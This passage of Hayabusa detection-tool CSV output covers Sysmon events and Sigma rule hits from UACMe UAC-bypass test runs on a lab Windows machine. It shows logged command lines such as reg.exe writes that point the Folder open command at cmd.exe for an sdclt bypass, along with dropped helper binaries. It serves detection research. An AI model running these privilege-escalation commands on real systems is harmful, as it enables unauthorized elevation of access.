""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | LID: 0x18d3b3 | PID: 6236 | PGUID: 747F3D96-9124-5D45-0000-00103B986101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:29.461 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\fubuki.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3180 | Src PGUID: 747F3D96-9124-5D45-0000-001022926101 | Tgt PID: 6236 | Tgt PGUID: 747F3D96-9124-5D45-0000-00103B986101,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 15:08:06.262 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 39 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4480 | PGUID: 747F3D96-A356-5D45-0000-001029AA9901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:06.262 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:06.262 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:06.419 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\explorer.exe | PID: 4480 | PGUID: 
747F3D96-A356-5D45-0000-001029AA9901,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:06.419 +00:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/file_event_win_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:06.730 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3fb | PID: 1492 | PGUID: 747F3D96-A356-5D45-0000-0010C5C59901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:06.796 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 376 0000028064463A00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7840 | PGUID: 747F3D96-A356-5D45-0000-001006D49901,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:07.144 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3b3 | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:07.508 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\System32\mmc.exe | Company: Hazardous Environments | 
Signed: false | Signature: Unavailable | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901 | Hash: SHA1=60BFDEAE730B165AF65A82817CED76F7400C9CF0,MD5=CC591D9CA772C818093FED853BF64848,SHA256=EC793B0A45BDB2F15D210E545A893AA096D68FF537DD022C4B443BDE2A448491,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:07.558 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | LID: 0x18d3b3 | PID: 5396 | PGUID: 747F3D96-A357-5D45-0000-0010BD149A01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:07.558 +00:00,MSEDGEWIN10,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation_sysmon/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:16:30.389 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 41 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-03 15:16:30.389 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-03 15:16:30.389 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious 
Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-03 15:16:31.012 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 00000280644BB040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1080 | PGUID: 747F3D96-A54E-5D45-0000-0010D507A101,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-03 15:16:31.779 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x18d3b3 | PID: 1716 | PGUID: 747F3D96-A54F-5D45-0000-0010D83FA101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-03 15:16:31.779 +00:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation_sysmon/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-03 15:16:31.875 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 07:26:33.984 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 43 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7436 | PGUID: 
747F3D96-88A9-5D46-0000-0010EC927D03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 07:26:33.984 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 07:26:33.984 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 07:26:34.302 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 0000028064468040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1412 | PGUID: 747F3D96-88AA-5D46-0000-00101C9F7D03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 07:26:34.689 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 330 000002806444C490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6488 | PGUID: 747F3D96-88AA-5D46-0000-001059C57D03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 07:26:35.182 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937} | LID: 0x18d3b3 | PID: 4300 | PGUID: 
747F3D96-88AB-5D46-0000-001081ED7D03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 07:26:35.182 +00:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation_sysmon/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 07:26:36.239 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 08:56:16.228 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:16.228 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:16.228 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:16.650 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-45 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\exefile\shell\open\command\(Default): c:\Windows\SysWOW64\notepad.exe | Process: 
C:\Windows\explorer.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:16.650 +00:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,rules/sigma/registry_sysmon/registry_event/registry_event_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:16.967 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5980 | PGUID: 747F3D96-9DB0-5D46-0000-0010AE65AF03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:18.321 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\ChangePk.exe"" | Process: C:\Windows\System32\changepk.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\slui.exe"" 0x03 | LID: 0x18d3b3 | PID: 2364 | PGUID: 747F3D96-9DB2-5D46-0000-00106DBDAF03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:18.321 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:20.446 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 444 00000280644250C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5208 | PGUID: 
747F3D96-9DB4-5D46-0000-0010F825B003,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:20.937 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey | Process: C:\Windows\System32\SystemSettingsAdminFlows.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel | LID: 0x18d3b3 | PID: 7880 | PGUID: 747F3D96-9DB4-5D46-0000-00105E3CB003",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:22.193 +00:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_sysmon/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:22.267 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 09:10:28.612 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 53 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:28.612 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:28.612 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:28.807 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 7312 | PGUID: 747F3D96-A104-5D46-0000-0010C79CBC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:28.893 +00:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,rules/sigma/registry_sysmon/registry_set/registry_set_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:28.925 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:29.060 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-53 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Folder\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2576 | PGUID: 
747F3D96-A104-5D46-0000-001092A6BC03,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:29.409 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3fb | PID: 4512 | PGUID: 747F3D96-A105-5D46-0000-001071B8BC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:29.431 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 300 000002806445E5C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7604 | PGUID: 747F3D96-A105-5D46-0000-001020C0BC03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:30.395 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3b3 | PID: 4532 | PGUID: 747F3D96-A105-5D46-0000-00103BEBBC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:30.395 +00:00,MSEDGEWIN10,1,medium,PrivEsc | Evas,High Integrity Sdclt Process,,rules/sigma/process_creation_sysmon/proc_creation_win_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:30.752 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\sdclt.exe"" | LID: 0x18d3b3 | PID: 1380 | PGUID: 747F3D96-A106-5D46-0000-00107201BD03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:30.752 +00:00,MSEDGEWIN10,1,medium,PrivEsc,Sdclt Child Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:30.972 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | LID: 0x18d3b3 | PID: 6604 | PGUID: 747F3D96-A106-5D46-0000-00102425BD03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:35.402 +00:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_sysmon/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:35.454 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:33:57.582 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:57.582 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:57.582 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:57.800 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:57.800 +00:00,MSEDGEWIN10,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:58.087 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3296 | PGUID: 747F3D96-A685-5D46-0000-00100D41D703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:58.127 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 5860 | PGUID: 
747F3D96-A685-5D46-0000-00106442D703,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:58.127 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:58.127 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:58.713 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3020 | PGUID: 